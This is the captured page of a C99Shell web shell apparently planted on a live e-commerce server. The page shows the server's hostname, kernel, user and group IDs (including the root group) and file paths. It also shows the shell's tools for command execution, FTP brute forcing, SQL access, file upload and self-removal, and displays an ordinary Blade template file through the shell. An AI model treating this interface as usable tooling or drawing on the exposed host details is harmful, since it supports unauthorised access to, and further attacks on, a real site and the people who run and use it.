!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/resources/views/site/layouts/includes/   drwxr-xr-x
Free 26.16 GB of 117.98 GB (22.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     child_category.blade.php (1.95 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<li class="border-b {{ languageDirection() == 'ltr' ? 'text-left' : 'text-right' }} text-gray-10 overflow-hidden w-63">
    <button class="w-full category-hover {{ languageDirection() == 'ltr' ? 'text-left' : 'text-right' }} flex items-center outline-none focus:outline-none">
        <div class="w-64 h-12 flex-shrink-0 md:mx-0 mx-auto text-center {{ languageDirection() == 'ltr' ? 'md:text-left' : 'md:text-right' }} p-1 py-2 relative">
            <a href="{{ route('site.productSearch', ['categories' => $child_category->slug]) }}"
                class="flex title-font font-medium items-center md:justify-start justify-center {{ languageDirection() == 'ltr' ? 'ml-2' : 'mr-2' }} m-1">
                <span
                    class="{{ languageDirection() == 'ltr' ? 'ml-3' : 'mr-3' }} text-sm cursor-pointer text-one">
                    {{ $child_category->name }}
                </span>
                @if(count($child_category->categories))
                <span
                    class="rtl-direction absolute top-0 {{ languageDirection() == 'ltr' ? '-right-1 ml-3' : '-left-1 mr-3' }} text-center text-sm h-6 w-6 p-0.5 mt-3">
                    <svg class="fill-current h-4 w-4
                        " xmlns="http://www.w3.org/2000/svg"
                        viewBox="0 0 20 20">
                        <path
                            d="M9.293 12.95l.707.707L15.657 8l-1.414-1.414L10 10.828 5.757 6.586 4.343 8z" />
                    </svg>
                </span>
                @endif
            </a>
        </div>
    </button>
    @if ($child_category->categories->count() > 0)
    <ul class="bg-white border pb-0.5 absolute top-0 {{ languageDirection() == 'ltr' ? 'right-0.5' : 'left-0.5' }}
     ul-mr min-h-full w-63">
     @foreach ($child_category->categories as $childCategory)
        @include('../site/layouts.includes.child_category', ['child_category' => $childCategory])
     @endforeach
    </ul>
    @endif
</li>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--